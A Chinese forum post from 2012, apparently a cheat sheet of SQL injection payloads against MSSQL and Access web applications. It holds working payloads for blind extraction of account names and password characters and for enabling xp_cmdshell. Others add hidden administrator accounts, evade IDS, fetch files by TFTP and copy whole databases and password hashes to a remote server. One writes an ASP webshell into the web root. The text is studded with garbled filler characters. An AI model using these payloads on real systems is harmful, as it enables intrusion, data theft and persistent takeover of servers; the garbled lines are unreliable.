

作者: admin    时间: 2012-9-15 14:32
标题: SQL注入语句2
1.判断有无注入点
; and 1=1 and 1=2
; o2 s# M* G+ g
! c7 a8 w- K8 n$ X: ]
2.猜表 一般的表的名称无非是admin adminuser user pass password 等。
/ Q, W4 m2 Y% Z# \and 0<>(select count(*) from *) ( b+ e# H, g& d. N' J
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
; b/ L6 L8 R) @  u) U! [+ K8 V: U, m
% ?6 Q( A: f; O: N& j1 H- i9 V, s2 c- a1 s" @; W% Y/ o" u# U
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
4 d. C  \: m3 band 0<(select count(*) from admin)
% T) _# P- R% x' Jand 1<(select count(*) from admin) - L: r) Q4 g- q
猜列名还有 and (select count(列名) from 表名)>01 Y: \" d& I( U: d1 ]
  Y# J/ I8 m. J: {1 _

4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称。
1 Y; D! p/ r! c% e6 ?7 M8 ]and 1=(select count(*) from admin where len(*)>0)--
1 A  v/ M' J! B+ o8 f2 Jand 1=(select count(*) from admin where len(用户字段名称name)>0)
8 W( }" Y, u: t1 P% I( yand 1=(select count(*) from admin where len(密码字段名称password)>0)   G/ X- ~# B  [, X, J7 y; V

5.猜解各个字段的长度 猜解长度就是把>0变换，直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
: P; T) G! R9 O7 z. f- Y, Qand 1=(select count(*) from admin where len(name)>6) 错误
" |( ~5 L2 d$ }( [; [, gand 1=(select count(*) from admin where len(name)>5) 正确 长度是6 7 o5 J/ K' l' l9 s( y# x* u/ Q; Y
and 1=(select count(*) from admin where len(name)=6) 正确
+ b* b6 ~# Z+ E% F- F- W2 y
8 L% x8 u5 d+ P8 Vand 1=(select count(*) from admin where len(password)>11) 正确 $ y4 U5 g+ S; s. _; L
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 3 S! k9 D/ L- h; e
and 1=(select count(*) from admin where len(password)=12) 正确 1 k4 j; _! {/ u7 z
猜长度还有 and (select top 1 len(username) from admin)>5
- V! _/ I- l* S) \- @4 d+ V6 ?5 S& A: `- U
! X: Z" Q! Q( c$ S) `6 [2 V# |
6.猜解字符
) g8 p# n& N3 Xand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
3 _: [  S" G4 {1 w" G9 P# A3 Yand 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
就这样一次加一个字符这样猜，猜到够你刚才猜出来的位数就对了，帐号就算出来了
- `! d9 V! _: I) d& ?  ]1 b' z: M3 ^6 M) K. S1 @. S
猜内容还有  and (select top 1 asc(mid(password,1,1)) from admin)>50  用ASC码算
1 M3 @* I* ~% G/ v7 y- x  O$ cand 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
这个查询语句可以猜解中文的用户和密码。只要把后面的数字换成中文的ASCII码就可以，最后把结果再转换成字符。
! q5 k; V& V% v$ ]# i8 ]" d. d( t: ]1 K4 G( C) ]0 k/ N( B& }
group by users.id having 1=1--
5 U& q0 M# z! i9 j) s- H2 Dgroup by users.id, users.username, users.password, users.privs having 1=1-- ! s6 N, t' ^8 @
; insert into users values( 666, attacker, foobar, 0xffff )--
" i" _- m- H$ j1 Y) A* V- C" w! D" V% A; D9 \6 ]$ m1 R
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
+ D9 X+ w) M( g+ ?UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-
. q/ Q' u" o! @UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
9 n* S9 g+ Y- _0 w1 ^7 q) X6 NUNION SELECT TOP 1 login_name FROM logintable-
9 G" T* D0 ~9 C9 G  R) l1 ~& o  U' |UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
) ^: ?. {4 j% P% Y4 D
看服务器打的补丁：出错了说明打了SP4补丁
and 1=(select @@VERSION)--
1 T( [7 P8 H, Q& v% g  W' Q3 V6 \# @
看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
; Y7 F7 @' [, {! ?3 S
判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
7 K! n" g* K' g) m5 L6 X* q! P/ Mand sa=(SELECT System_user)--
% \# K5 p. |2 P9 R! \9 {$ P) L7 |: s8 R8 Wand user_name()=dbo-- # i7 I) m" h8 d0 W* n7 z
and 0<>(select user_name()-- / u9 B$ Q3 a1 B/ P0 X9 k) E' V

看xp_cmdshell是否被删除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
/ B0 E# m! m1 W% R3 x# d9 m: @4 j: F) r0 g
xp_cmdshell被删除,恢复,支持绝对路径的恢复
2 R& y: c9 u: {;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
6 \( z4 m, Q  F$ n  h/ C;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- 8 w+ `+ U! c  P+ m0 C
9 ~8 L5 k) q9 T8 s& O
反向PING自己实验
  K% ]4 b: }9 \$ k6 \" l$ c;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- 7 `" }6 f% m% {$ f1 @# P

加帐号
+ [: r4 u6 K  y+ H* Z' n8 \3 B;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
: {0 x2 h4 C+ f0 G
创建一个虚拟目录E盘:
0 c9 p: R6 T- S/ o( Z;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- 5 R: |3 N1 H3 b$ j# f

访问属性:(配合写入一个webshell)
0 ?, z, Y. w# t) Y7 Vdeclare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
9 X% `1 K# [2 l+ q" }5 ~5 U' ]: F! T9 j  O; `; J

MSSQL也可以用联合查询
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 7 _/ L) ^5 [  e9 {/ A- h# M
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
* C9 t/ }1 \& V, Q- c+ z0 ?0 S6 Y4 ], |' z; K) V, V4 ]* |

爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交
$ h0 M  }$ U+ z  M. O% h3 H* }, U8 G" B+ _) I
% a; Q4 }: o- d+ R3 K2 p+ S  e; F3 K

得到WEB路径
; m9 ^. l) i+ _# b9 M;create table [dbo].[swap] ([swappass][char](255));-- ; \  R/ J  G" ^: E6 S7 g* s9 y9 m
and (select top 1 swappass from swap)=1--
, G1 R% U/ R- _! O8 j;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
/ V, L$ p* z9 s" R7 y& x;use ku1;--
9 P4 n. @+ I. B;create table cmd (str image);-- 建立image类型的表cmd $ p- e0 {( \. f+ ~

存在xp_cmdshell的测试过程:
" l0 Q: W" b7 g+ @;exec master..xp_cmdshell dir + x' E& Q2 h3 Q  h: k5 J4 {
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号 3 `; g# }$ q1 E8 j
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
9 K9 q$ L' b& i- g5 G4 X;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- 6 |% j* ~2 ^5 ^, d6 `( H2 Z$ I$ v
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;-- 6 [6 \  t. |  V, r( k& g" x, @. {
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;-- , P. J4 T0 U7 S# w# \1 u$ }
exec master..xp_servicecontrol start, schedule 启动服务 # j; r1 M. |. L- b1 j/ |" g" j2 F
exec master..xp_servicecontrol start, server : U4 H: g0 l9 Z+ j
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add 3 l: Z3 |) T. R
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
' ~: }2 u% q" a, ~% d; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 , b& ^$ t$ e  ]! }$ I0 j& G
, \: Z1 R1 t2 t) h! k* D" Y
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
3 H6 E% s9 b& `; G;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
! ?4 ?  b2 y: m1 r6 a  K;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat 7 t* y( L2 r: d; I) F
如果被限制，则可以用下面的方法。
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
, {3 D% J( N7 Q! C% j. L5 k8 ]' Z# E, K6 x% K; m/ }( \
查询构造:
, \) t3 S* T" t2 s( O1 \+ oSELECT * FROM news WHERE id=... AND topic=... AND ..... 3 W* A- K- H9 K& C
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <> 4 B* @/ d6 V" g1 L% U6 b$ U
select 123;--
- l9 g: u5 ?% m;use master;--
8 C, {5 k' o/ x:a or name like fff%;-- 显示有一个叫ffff的用户哈。 * V3 L; `$ W9 F9 M6 l
and 1<>(select count(email) from [user]);-- ( f- C/ i: K8 X6 }
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
, H- }: z* h* {" m9 G) Q;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
& W; e) h! a. p% N: b;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--   t+ m6 y* C6 }; g2 e) M/ S0 {
;update [users] set email=(select top 1 count(id) from password) where name=ffff;-- ' c0 \: ^' r' D& P
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;-- + f  D6 V5 U1 m, I$ e" t( ?; M
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
上面的语句是得到数据库中的第一个用户表，并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用户表叫ad
然后根据表名ad得到这个表的ID，再得到第二个表的名字

- V0 g: f5 u( S4 `insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
  j$ W. Y6 P! e3 v0 Ainsert into users values( 667,123,123,0xffff)-- : n! E. v; F6 B
insert into users values ( 123, admin--, password, 0xffff)--
0 {  C$ N9 {5 u;and user>0
2 Z3 R( ~0 Y6 X8 m* v* I;and (select count(*) from sysobjects)>0 $ z5 g" y- g6 k# b! ]1 I
;and (select count(*) from mysysobjects)>0 //为access数据库
! @0 B# A# d% W% L& |- a2 g& \+ z- O6 k5 O. F
枚举出数据表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
这是将第一个表名更新到aaa的字段处。
读出第一个表，第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- * Z: y' [7 N9 w3 b' ]4 r- D1 o
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表，一个个地读出，直到没有为止。
读字段是这样:
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));-- : g  S' d$ d- a( }
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 ( S; G* A: t% F+ \- x8 J7 }
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));-- 1 d( k* P& X/ w- D: M( Q/ \5 p
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
- m% @5 v5 g. n6 h
[获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名]
2 z. e$ @1 w$ _9 S9 W1 |+ Wupdate 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…) $ e. f1 _2 _, r7 Y- b
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
% f( h$ f/ \2 E
[获得数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]
) o  d( c% L, `1 M% S
绕过IDS的检测[使用变量]
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
; d) L9 E# \3 n3 G3 N$ ~; p( j;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ : ]6 u7 h9 N/ I% _
! y6 W& m7 a0 T" F+ {) j# c
1、 开启远程数据库
基本语法
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 ) 7 A1 z( e4 J  I) n3 u
参数: (1) OLEDB Provider name
2、 其中连接字符串参数可以是任何端口用来连接，比如
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table 5 L: L$ g! m, l! L8 d0 U2 n+ K! y8 i
3.复制目标主机的整个数据库：insert所有远程表到本地表。
! y" Q, p" H1 \& F8 W
基本语法:
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 0 L9 ~; a0 q  b* i+ v: q
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口，指向需要的地方，比如:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 * x7 h( e$ n5 H- p- E" d
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
& e; }& l$ L( |select * from master.dbo.sysdatabases
7 y0 L0 N" O5 ?1 B+ j1 [insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
! H9 O" j* @. Q7 d5 u3 }5 m5 n" xselect * from user_database.dbo.sysobjects % E& ~4 G. W$ J! q' A/ G" s
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns) $ P' b- [( m  b/ c: w# V
select * from user_database.dbo.syscolumns 2 {8 y; ~; Y: t: B
复制数据库:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 9 i" M2 m5 W4 n& y$ D. R+ k% a! t
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 3 F& T5 ~0 G' D, Q" d

复制哈希表(HASH)：登录密码的hash存储于sysxlogins中。方法如下:
- I6 }/ P* }) D! v1 r) j( winsert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
得到hash之后，就可以进行暴力破解。

遍历目录的方法: 先创建一个临时表:temp
3 v) @& m8 i+ {* H5 R! B;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
5 _% g" `( S7 n2 y/ L;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
2 ]/ ?0 X# ~. S# A$ Q; k;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
2 v6 D" ]% d9 @& c& L;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中 " `" |; P  n! z6 ^3 k7 f. ?% j% c
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容 * {6 D6 S0 U6 R- t- a! h) q# |
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--   L# d$ R9 A- J2 z. r
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
6 S  q+ P2 c& z- f7 Y;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
3 S+ x3 P+ }  O! S& L+ c- ?;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC)
写入表:
语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
4 k6 `" d6 B" F3 F) h  A2 @$ {语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
$ {- W; v+ M- B( X# w语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));-- ' O& l# k6 n/ }- k" b
语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
, M: A5 k4 f, Q, e+ w; s语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
* X* Q" P$ V- w/ x语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));-- - Z1 ?( ^# s, P0 w& x) U* n
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- # L* k7 C% M' c, x1 N5 T' A
语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
) r0 j9 V! v0 \" {语句9:and 1=(SELECT IS_MEMBER(db_owner));--
  I# u' k/ v: O  b- q, s' M
把路径写到表中去:
;create table dirs(paths varchar(100), id int)-- & R9 `, ?0 w! O6 b/ r! s: {
;insert dirs exec master.dbo.xp_dirtree c:\--
$ c. g" I6 T# M+ G: e% Tand 0<>(select top 1 paths from dirs)--
5 m+ ?- h5 ]: i5 d/ @and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- * I3 ?; I, p. e8 _
;create table dirs1(paths varchar(100), id int)-- 5 R- @& _% b' v2 O7 |. j3 N
;insert dirs exec master.dbo.xp_dirtree e:\web-- ( J% n, A/ m) G+ A
and 0<>(select top 1 paths from dirs1)-- 5 [( V5 [6 ?& |
, c; N9 B- z3 [  [+ J5 N
把数据库备份到网页目录:下载
8 _. ^1 ^* c/ i4 |' v" b;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
8 H6 k' H+ v* V" M$ m' z( U
" A8 s* E( B2 y, ?+ O3 h% x1 Pand 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
+ r  o2 x& z& ~4 F5 _# I9 S" aand 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。 5 Q, E2 W0 C  ~  j6 }, @
and 1=(select user_id from USER_LOGIN)
! v& l3 U: e* G$ T: u5 k' Yand 0=(select user from USER_LOGIN where user>1)
0 l1 ^# D* F1 j" t4 Y; P0 `- m% o6 a' i& s1 r1 s
-=- wscript.shell example -=-
declare @o int
; Z: K' Q6 R7 \5 ?7 Pexec sp_oacreate wscript.shell, @o out * r- Y1 A8 |( S& r; b
exec sp_oamethod @o, run, NULL, notepad.exe
: T2 Y$ i) W) y6 b9 o; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe-- # c! y1 E8 J8 S& L0 e0 l1 U
. Y5 ^. u; |+ x. \$ D& {5 v
declare @o int, @f int, @t int, @ret int
6 Y5 [( ?0 o$ g, b4 n0 fdeclare @line varchar(8000)
7 p3 _0 z4 X  Z! Kexec sp_oacreate scripting.filesystemobject, @o out
5 m/ h5 w6 J* _3 i: bexec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 3 F, r3 q9 @- O2 x* {
exec @ret = sp_oamethod @f, readline, @line out
6 J# D6 a& f, v/ \while( @ret = 0 )
6 \: P7 M; o2 j3 m( Dbegin
3 }+ r# J8 U( ~6 ^1 G7 P- hprint @line . w! V5 k% [4 D+ ?* F. |# o3 `6 h
exec @ret = sp_oamethod @f, readline, @line out ) H, _+ K2 ], F/ f* Q( }% q! n
end   f: R$ C! U: b! p& ?
& T& S: i  C3 G# \& |3 n
declare @o int, @f int, @t int, @ret int
5 g8 d( U8 N: R) A9 E. r6 ?& Lexec sp_oacreate scripting.filesystemobject, @o out - y( ~' R8 {, F$ Y
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
* e8 i( h5 j9 H0 Lexec @ret = sp_oamethod @f, writeline, NULL, + R3 V0 ?) }; v4 z0 Z# P/ R
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
! D/ }# Y6 i7 k- v. t4 C; J
3 e# m9 Q+ [; f6 V/ Adeclare @o int, @ret int
! B2 @7 N% q- _8 J! l& [exec sp_oacreate speech.voicetext, @o out
; ?4 L* T  e0 a7 S6 u% l+ iexec sp_oamethod @o, register, NULL, foo, bar & @  V% s. s/ r6 i+ k
exec sp_oasetproperty @o, speed, 150 : s1 f4 t6 i- l2 Q1 h, k  p2 b
exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 * ~# u: V4 @" T/ q
waitfor delay 00:00:05
9 K% l5 L9 b2 M( q
( h* c4 |: y# j" K: O6 x; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- 5 h% ]3 x; {6 O
; U' e& Z/ P1 V+ I; Y: A
xp_dirtree适用权限PUBLIC
exec master.dbo.xp_dirtree c: 返回的信息有两个字段subdirectory、depth。subdirectory字段是字符型，depth字段是整型字段。
  Z9 w: K* [7 Y0 h, M6 C! Jcreate table dirs(paths varchar(100), id int)
建表，这里建的表是和上面xp_dirtree相关联，字段相等、类型相同。
insert dirs exec master.dbo.xp_dirtree c: 只要我们建表与存储过程返回的字段定义相等就能够执行！达到写表的效果，一步步达到我们想要的信息！




